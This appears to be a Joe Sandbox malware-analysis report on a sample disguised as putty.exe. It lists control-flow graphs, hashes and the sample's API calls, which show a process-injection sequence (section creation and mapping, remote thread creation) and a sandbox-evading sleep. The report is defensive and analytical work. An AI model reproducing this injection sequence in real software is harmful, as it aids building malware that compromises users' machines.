                                                                                                  execution_graph 10671 561606 10674 561617 10671->10674 10675 561626 10674->10675 10678 561db7 10675->10678 10681 561dd2 10678->10681 10679 561ddb CreateToolhelp32Snapshot 10680 561df7 Module32First 10679->10680 10679->10681 10682 561e06 10680->10682 10683 561616 10680->10683 10681->10679 10681->10680 10685 561a76 10682->10685 10686 561aa1 10685->10686 10687 561ab2 VirtualAlloc 10686->10687 10688 561aea 10686->10688 10687->10688 10689 6d003c 10690 6d0049 10689->10690 10702 6d0e0f SetErrorMode SetErrorMode 10690->10702 10695 6d0265 10696 6d02ce VirtualProtect 10695->10696 10698 6d030b 10696->10698 10697 6d0439 VirtualFree 10701 6d04be LoadLibraryA 10697->10701 10698->10697 10700 6d08c7 10701->10700 10703 6d0223 10702->10703 10704 6d0d90 10703->10704 10705 6d0dad 10704->10705 10706 6d0dbb GetPEB 10705->10706 10707 6d0238 VirtualAlloc 10705->10707 10706->10707 10707->10695 10708 402e51 10709 402e44 10708->10709 10711 402ef2 10709->10711 10712 401891 10709->10712 10713 4018a1 10712->10713 10714 4018da Sleep 10713->10714 10719 4013bf 10714->10719 10716 4018f5 10718 401906 10716->10718 10731 4014b5 10716->10731 10718->10711 10721 4013d0 10719->10721 10720 401478 10720->10716 10721->10720 10722 401564 NtDuplicateObject 10721->10722 10722->10720 10723 401581 NtCreateSection 10722->10723 10724 401601 NtCreateSection 10723->10724 10725 4015a7 NtMapViewOfSection 10723->10725 10724->10720 10727 40162d 10724->10727 10725->10724 10726 4015ca NtMapViewOfSection 10725->10726 10726->10724 10730 4015e8 10726->10730 10727->10720 10728 401637 NtMapViewOfSection 10727->10728 10728->10720 10729 40165e NtMapViewOfSection 10728->10729 10729->10720 10730->10724 10732 4014c6 10731->10732 10733 401564 NtDuplicateObject 10732->10733 10741 401680 10732->10741 10734 401581 NtCreateSection 10733->10734 10733->10741 10735 401601 NtCreateSection 10734->10735 10736 4015a7 NtMapViewOfSection 10734->10736 10738 40162d 10735->10738 10735->10741 10736->10735 10737 4015ca NtMapViewOfSection 10736->10737 10737->10735 10739 4015e8 10737->10739 10740 401637 NtMapViewOfSection 10738->10740 10738->10741 10739->10735 10740->10741 10742 40165e NtMapViewOfSection 10740->10742 10741->10718 10742->10741 10743 40c3b1 HeapCreate 10744 40c3d5 10743->10744 10745 402f8f 10746 4030d2 10745->10746 10747 402fb9 10745->10747 10747->10746 10748 403074 RtlCreateUserThread NtTerminateProcess 10747->10748 10748->10746

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 85 4013bf-4013c8 86 4013d0-4013d6 85->86 87 4013da 85->87 88 4013dd-401422 call 40113b 86->88 87->86 87->88 98 401424-401440 88->98 99 401496-40149e 88->99 100 401442 98->100 101 4014b7-4014d5 98->101 102 4014a0-4014b2 99->102 104 401492-401494 100->104 105 401444-401446 100->105 106 4014c6-4014e9 101->106 105->102 107 401448-401461 105->107 115 4014e0-4014e4 106->115 111 401463-401468 107->111 112 4014c4 107->112 113 4014e5-40150e call 40113b 111->113 114 40146a 111->114 112->106 126 401510 113->126 127 401513-401518 113->127 117 40146c-401476 114->117 118 4014de 114->118 115->113 119 401414-401422 117->119 120 401478-40147c 117->120 118->115 119->98 119->99 126->127 129 40183d-401845 127->129 130 40151e-40152f 127->130 129->127 133 401535-40155e 130->133 134 40183b-40184a 130->134 133->134 143 401564-40157b NtDuplicateObject 133->143 136 401861 134->136 137 401852-40185d 134->137 136->137 139 401864-40188e call 40113b 136->139 137->139 143->134 145 401581-4015a5 NtCreateSection 143->145 146 401601-401627 NtCreateSection 145->146 147 4015a7-4015c8 NtMapViewOfSection 145->147 146->134 150 40162d-401631 146->150 147->146 149 4015ca-4015e6 NtMapViewOfSection 147->149 149->146 152 4015e8-4015fe 149->152 150->134 153 401637-401658 NtMapViewOfSection 150->153 152->146 153->134 155 40165e-40167a NtMapViewOfSection 153->155 155->134 158 401680 call 401685 155->158 158->134
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.2239026919.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_400000_putty.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f1a6a853dab4f549cc320576fe09db09b07e35a282cbb1e4dab32455e86f95e0
                                                                                                  • Instruction ID: b303ee40ce3cd715bffe5459f1355022e0f5cf8d3c2eb96fe6471530370b2b0e
                                                                                                  • Opcode Fuzzy Hash: f1a6a853dab4f549cc320576fe09db09b07e35a282cbb1e4dab32455e86f95e0
                                                                                                  • Instruction Fuzzy Hash: 3BA10872A04204FBEB219F91CC45EEB7BB8EF81710F24452BF902BA1F1D6749902DB65

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 161 4014b5-4014be 162 4014d5 161->162 163 4014c6-40150e call 40113b 161->163 162->163 174 401510 163->174 175 401513-401518 163->175 174->175 177 40183d-401845 175->177 178 40151e-40152f 175->178 177->175 181 401535-40155e 178->181 182 40183b-40184a 178->182 181->182 191 401564-40157b NtDuplicateObject 181->191 184 401861 182->184 185 401852-40185d 182->185 184->185 187 401864-40188e call 40113b 184->187 185->187 191->182 193 401581-4015a5 NtCreateSection 191->193 194 401601-401627 NtCreateSection 193->194 195 4015a7-4015c8 NtMapViewOfSection 193->195 194->182 198 40162d-401631 194->198 195->194 197 4015ca-4015e6 NtMapViewOfSection 195->197 197->194 200 4015e8-4015fe 197->200 198->182 201 401637-401658 NtMapViewOfSection 198->201 200->194 201->182 203 40165e-40167a NtMapViewOfSection 201->203 203->182 206 401680 call 401685 203->206 206->182
                                                                                                  APIs
                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C3
                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015E1
                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401622
                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401653
                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401675
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.2239026919.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_400000_putty.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                  • String ID:
                                                                                                  • API String ID: 1546783058-0
                                                                                                  • Opcode ID: 719849d05dd569a84f102b076dd352e16165c28b1771b30273656c5f16ef7e6e
                                                                                                  • Instruction ID: 19a1d6b0ff796e10bf8f41dee95350edbff68fa9ff5f9bfea876b5d94b6971b3
                                                                                                  • Opcode Fuzzy Hash: 719849d05dd569a84f102b076dd352e16165c28b1771b30273656c5f16ef7e6e
                                                                                                  • Instruction Fuzzy Hash: C9513BB1900245BFEB209F91CC48FAB7BB8FF85B10F14412AFA11BA2E5D6759941CB64

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 209 4014d3-4014eb 211 4014d8-4014f8 209->211 212 4014ed 209->212 214 4014f1-40150e call 40113b 211->214 212->214 221 401510 214->221 222 401513-401518 214->222 221->222 225 40183d-401845 222->225 226 40151e-40152f 222->226 225->222 229 401535-40155e 226->229 230 40183b-40184a 226->230 229->230 239 401564-40157b NtDuplicateObject 229->239 232 401861 230->232 233 401852-40185d 230->233 232->233 235 401864-40188e call 40113b 232->235 233->235 239->230 241 401581-4015a5 NtCreateSection 239->241 242 401601-401627 NtCreateSection 241->242 243 4015a7-4015c8 NtMapViewOfSection 241->243 242->230 246 40162d-401631 242->246 243->242 245 4015ca-4015e6 NtMapViewOfSection 243->245 245->242 248 4015e8-4015fe 245->248 246->230 249 401637-401658 NtMapViewOfSection 246->249 248->242 249->230 251 40165e-40167a NtMapViewOfSection 249->251 251->230 254 401680 call 401685 251->254 254->230
                                                                                                  APIs
                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.2239026919.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_400000_putty.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Section$CreateDuplicateObjectView
                                                                                                  • String ID:
                                                                                                  • API String ID: 1652636561-0
                                                                                                  • Opcode ID: b37d7a3f5bcaad5f7e116b16f8babae0ae157dca3b6d02a9ae2d42698eee0e78
                                                                                                  • Instruction ID: 8103355e2e942ff69e8c14b284ac6daeef9955d1bae1450e847efa7766c746d9
                                                                                                  • Opcode Fuzzy Hash: b37d7a3f5bcaad5f7e116b16f8babae0ae157dca3b6d02a9ae2d42698eee0e78
                                                                                                  • Instruction Fuzzy Hash: 245127B1900245BBEF209F91CC48FABBBB8EF86B00F144159FA11BA2A5D6719941CB24

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 257 4014f7-40150e call 40113b 261 401510 257->261 262 401513-401518 257->262 261->262 264 40183d-401845 262->264 265 40151e-40152f 262->265 264->262 268 401535-40155e 265->268 269 40183b-40184a 265->269 268->269 278 401564-40157b NtDuplicateObject 268->278 271 401861 269->271 272 401852-40185d 269->272 271->272 274 401864-40188e call 40113b 271->274 272->274 278->269 280 401581-4015a5 NtCreateSection 278->280 281 401601-401627 NtCreateSection 280->281 282 4015a7-4015c8 NtMapViewOfSection 280->282 281->269 285 40162d-401631 281->285 282->281 284 4015ca-4015e6 NtMapViewOfSection 282->284 284->281 287 4015e8-4015fe 284->287 285->269 288 401637-401658 NtMapViewOfSection 285->288 287->281 288->269 290 40165e-40167a NtMapViewOfSection 288->290 290->269 293 401680 call 401685 290->293 293->269
                                                                                                  APIs
                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C3
                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015E1
                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401622
                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401653
                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401675
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.2239026919.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_400000_putty.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                  • String ID:
                                                                                                  • API String ID: 1546783058-0
                                                                                                  • Opcode ID: f4d7e0ef1ba092f52e3f3aa053b09444c5da80675db222bfe35b70c903d8b2e5
                                                                                                  • Instruction ID: 2227e086d9928dda04f460d80950503c889386f6503bf0ca9f5f85cfbacfc3af
                                                                                                  • Opcode Fuzzy Hash: f4d7e0ef1ba092f52e3f3aa053b09444c5da80675db222bfe35b70c903d8b2e5
                                                                                                  • Instruction Fuzzy Hash: 8B5107B1900249BFEF209F91CC48FAFBBB8EF85B10F144159FA11BA2A5D6719945CB24

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 296 402f8f-402fb3 297 4030d2-4030d7 296->297 298 402fb9-402fd1 296->298 298->297 299 402fd7-402fe8 298->299 300 402fea-402ff3 299->300 301 402ff8-403006 300->301 301->301 302 403008-40300f 301->302 303 403031-403038 302->303 304 403011-403030 302->304 305 40305a-40305d 303->305 306 40303a-403059 303->306 304->303 307 403066 305->307 308 40305f-403062 305->308 306->305 307->300 310 403068-40306d 307->310 308->307 309 403064 308->309 309->310 310->297 311 40306f-403072 310->311 311->297 312 403074-4030cf RtlCreateUserThread NtTerminateProcess 311->312 312->297
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.2239026919.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_400000_putty.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateProcessTerminateThreadUser
                                                                                                  • String ID:
                                                                                                  • API String ID: 1921587553-0
                                                                                                  • Opcode ID: 3666794f6f76943507f515948c416729d2a122008cd61b3dc3cfc1699990bb7a
                                                                                                  • Instruction ID: aa2530698c6aa4494656ae1f9c01ee64b6dc24c6198c14284b052c109098bfb9
                                                                                                  • Opcode Fuzzy Hash: 3666794f6f76943507f515948c416729d2a122008cd61b3dc3cfc1699990bb7a
                                                                                                  • Instruction Fuzzy Hash: 1F415832618E0C4FD778EE6CA88966377D5E794351B56437AE809D3388EE30DC5183C5

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 313 561db7-561dd0 314 561dd2-561dd4 313->314 315 561dd6 314->315 316 561ddb-561de7 CreateToolhelp32Snapshot 314->316 315->316 317 561df7-561e04 Module32First 316->317 318 561de9-561def 316->318 319 561e06-561e07 call 561a76 317->319 320 561e0d-561e15 317->320 318->317 323 561df1-561df5 318->323 324 561e0c 319->324 323->314 323->317 324->320
                                                                                                  APIs
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00561DDF
                                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 00561DFF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.2239261367.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_550000_putty.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                  • String ID:
                                                                                                  • API String ID: 3833638111-0
                                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                  • Instruction ID: bc8de655c12f8a54cab92cc6e2e2e60d9c48dcfeb5da85f72459963dbcdd31cb
                                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                  • Instruction Fuzzy Hash: 17F0C235500B116FD7202AF5A88CBBA7AF8BF49325F180528E642921C0CA70ED454764

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 6d003c-6d0047 1 6d004c-6d0263 call 6d0a3f call 6d0e0f call 6d0d90 VirtualAlloc 0->1 2 6d0049 0->2 17 6d028b-6d0292 1->17 18 6d0265-6d0289 call 6d0a69 1->18 2->1 19 6d02a1-6d02b0 17->19 22 6d02ce-6d03c2 VirtualProtect call 6d0cce call 6d0ce7 18->22 19->22 23 6d02b2-6d02cc 19->23 29 6d03d1-6d03e0 22->29 23->19 30 6d0439-6d04b8 VirtualFree 29->30 31 6d03e2-6d0437 call 6d0ce7 29->31 32 6d04be-6d04cd 30->32 33 6d05f4-6d05fe 30->33 31->29 35 6d04d3-6d04dd 32->35 36 6d077f-6d0789 33->36 37 6d0604-6d060d 33->37 35->33 39 6d04e3-6d0505 35->39 40 6d078b-6d07a3 36->40 41 6d07a6-6d07b0 36->41 37->36 42 6d0613-6d0637 37->42 51 6d0517-6d0520 39->51 52 6d0507-6d0515 39->52 40->41 44 6d086e-6d08be LoadLibraryA 41->44 45 6d07b6-6d07cb 41->45 46 6d063e-6d0648 42->46 50 6d08c7-6d08f9 44->50 48 6d07d2-6d07d5 45->48 46->36 49 6d064e-6d065a 46->49 53 6d0824-6d0833 48->53 54 6d07d7-6d07e0 48->54 49->36 55 6d0660-6d066a 49->55 56 6d08fb-6d0901 50->56 57 6d0902-6d091d 50->57 58 6d0526-6d0547 51->58 52->58 62 6d0839-6d083c 53->62 59 6d07e4-6d0822 54->59 60 6d07e2 54->60 61 6d067a-6d0689 55->61 56->57 63 6d054d-6d0550 58->63 59->48 60->53 64 6d068f-6d06b2 61->64 65 6d0750-6d077a 61->65 62->44 66 6d083e-6d0847 62->66 68 6d0556-6d056b 63->68 69 6d05e0-6d05ef 63->69 70 6d06ef-6d06fc 64->70 71 6d06b4-6d06ed 64->71 65->46 72 6d0849 66->72 73 6d084b-6d086c 66->73 74 6d056d 68->74 75 6d056f-6d057a 68->75 69->35 76 6d06fe-6d0748 70->76 77 6d074b 70->77 71->70 72->44 73->62 74->69 80 6d057c-6d0599 75->80 81 6d059b-6d05bb 75->81 76->77 77->61 84 6d05bd-6d05db 80->84 81->84 84->63
                                                                                                  APIs
                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006D024D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.2239346704.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_6d0000_putty.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID: cess$kernel32.dll
                                                                                                  • API String ID: 4275171209-1230238691
                                                                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                  • Instruction ID: 5ebbe460fe37c58c253ed573dd18450252dbf76ec07c608bcbb3694c3860dc94
                                                                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                  • Instruction Fuzzy Hash: 23525874E012299FDB64CF58C985BA8BBB1BF09304F1480DAE94DAB351DB30AA95DF14

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 326 6d0e0f-6d0e24 SetErrorMode * 2 327 6d0e2b-6d0e2c 326->327 328 6d0e26 326->328 328->327
                                                                                                  APIs
                                                                                                  • SetErrorMode.KERNELBASE(00000400,?,?,006D0223,?,?), ref: 006D0E19
                                                                                                  • SetErrorMode.KERNELBASE(00000000,?,?,006D0223,?,?), ref: 006D0E1E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.2239346704.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_6d0000_putty.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorMode
                                                                                                  • String ID:
                                                                                                  • API String ID: 2340568224-0
                                                                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                  • Instruction ID: d737391412cb78383b34bd059ac362a3996041c191b4104b2eff9d787dbb4a53
                                                                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                  • Instruction Fuzzy Hash: C7D0123154512877D7102A94DC09BCD7B1CDF05B62F008411FB0DD9180C770994046E5

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 329 40c3b1-40c3d3 HeapCreate 330 40c3d5-40c3d6 329->330 331 40c3d7-40c3e0 329->331
                                                                                                  APIs
                                                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040C3C6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.2239067945.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_40b000_putty.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 10892065-0
                                                                                                  • Opcode ID: 71222e89fbad33bf90c2f892ffc061b9edb59bf11242c618400469350826e5ca
                                                                                                  • Instruction ID: 94244e611b537c2edf94d5cca879c25ed5d218993ee5c4132b7c1dd7bdc8514f
                                                                                                  • Opcode Fuzzy Hash: 71222e89fbad33bf90c2f892ffc061b9edb59bf11242c618400469350826e5ca
                                                                                                  • Instruction Fuzzy Hash: 61D05E36590349AADB009FB27C097623BDCA385396F00C436B91CC6590F675C6809A08

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 554 401891-4018c1 561 4018d2 554->561 562 4018c9-4018f7 call 40113b Sleep call 4013bf 554->562 561->562 568 401906-40194c call 40113b 562->568 569 4018f9-401901 call 4014b5 562->569 569->568
                                                                                                  APIs
                                                                                                  • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                                                                    • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                    • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.2239026919.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_400000_putty.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                  • String ID:
                                                                                                  • API String ID: 4152845823-0
                                                                                                  • Opcode ID: 6c70d353b433dda2f53fd46e2b53eb18a00404936ca24d3f60717acb78d32f73
                                                                                                  • Instruction ID: 625976beb622557468fde4da7c406050b614696d38d370b0d4d52ea32007e278
                                                                                                  • Opcode Fuzzy Hash: 6c70d353b433dda2f53fd46e2b53eb18a00404936ca24d3f60717acb78d32f73
                                                                                                  • Instruction Fuzzy Hash: 2C0192B260C204EBEB002991CC91EBA32299B04350F308133B603790F1D57C8753B36F

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 583 4018a9-4018c1 590 4018d2 583->590 591 4018c9-4018f7 call 40113b Sleep call 4013bf 583->591 590->591 597 401906-40194c call 40113b 591->597 598 4018f9-401901 call 4014b5 591->598 598->597
                                                                                                  APIs
                                                                                                  • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                                                                    • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                    • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.2239026919.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_400000_putty.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                  • String ID:
                                                                                                  • API String ID: 4152845823-0
                                                                                                  • Opcode ID: a0416c7ea6c8b2beaa64009cd037ce3695af2c8d86f7782f0dc7d3fc67dd3c49
                                                                                                  • Instruction ID: 01e10882b1c060c9bcf7afaa20a424b8b06e3eaca9db3e31c9d827ddeb5dfa52
                                                                                                  • Opcode Fuzzy Hash: a0416c7ea6c8b2beaa64009cd037ce3695af2c8d86f7782f0dc7d3fc67dd3c49
                                                                                                  • Instruction Fuzzy Hash: 620178B260C204EBEB042A91CC91EBE2225AB08320F308133B603790F1D67C8753B72F
                                                                                                  APIs
                                                                                                  • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                                                                    • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                    • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.2239026919.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_400000_putty.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                  • String ID:
                                                                                                  • API String ID: 4152845823-0
                                                                                                  • Opcode ID: 6b9a7ba5e763362e57e967b3ef273788d2906451f38bbd38aba7de38a4ba4a16
                                                                                                  • Instruction ID: 091d8ab5f34d30388949969244c388a12b20eca364eb9837eec97541f3976fe9
                                                                                                  • Opcode Fuzzy Hash: 6b9a7ba5e763362e57e967b3ef273788d2906451f38bbd38aba7de38a4ba4a16
                                                                                                  • Instruction Fuzzy Hash: 46015AB360C244EBEB016A90C8A1EAA37659B48310F308577B643790F1D67C8753A72F
                                                                                                  APIs
                                                                                                  • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                                                                    • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                    • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.2239026919.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_400000_putty.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                  • String ID:
                                                                                                  • API String ID: 4152845823-0
                                                                                                  • Opcode ID: b76e6f8ea108e6f900b2be892df91fc6f607bea987df0946b9f50da5a95319bc
                                                                                                  • Instruction ID: 35dd9e0e0d775fbf54de8accc2db9d3c4b904cb042cfc7da377ce8c3fe766ee0
                                                                                                  • Opcode Fuzzy Hash: b76e6f8ea108e6f900b2be892df91fc6f607bea987df0946b9f50da5a95319bc
                                                                                                  • Instruction Fuzzy Hash: 5501A2B6208244EBDB015AA4CD52AEE37259B04320F244177FA13BA0F1DA7CC653E76F
                                                                                                  APIs
                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00561AC7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.2239261367.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_550000_putty.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 4275171209-0
                                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                  • Instruction ID: aff20d52a9c588fc6b13692dee3658f59963d38de5e7970137cf2ea7c5bf82bd
                                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                  • Instruction Fuzzy Hash: 31113C79A00208EFDB01DF98C989E98BFF5AF08351F098094F9489B362D771EA50DF84
                                                                                                  APIs
                                                                                                  • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                                                                    • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                    • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.2239026919.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_400000_putty.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                  • String ID:
                                                                                                  • API String ID: 4152845823-0
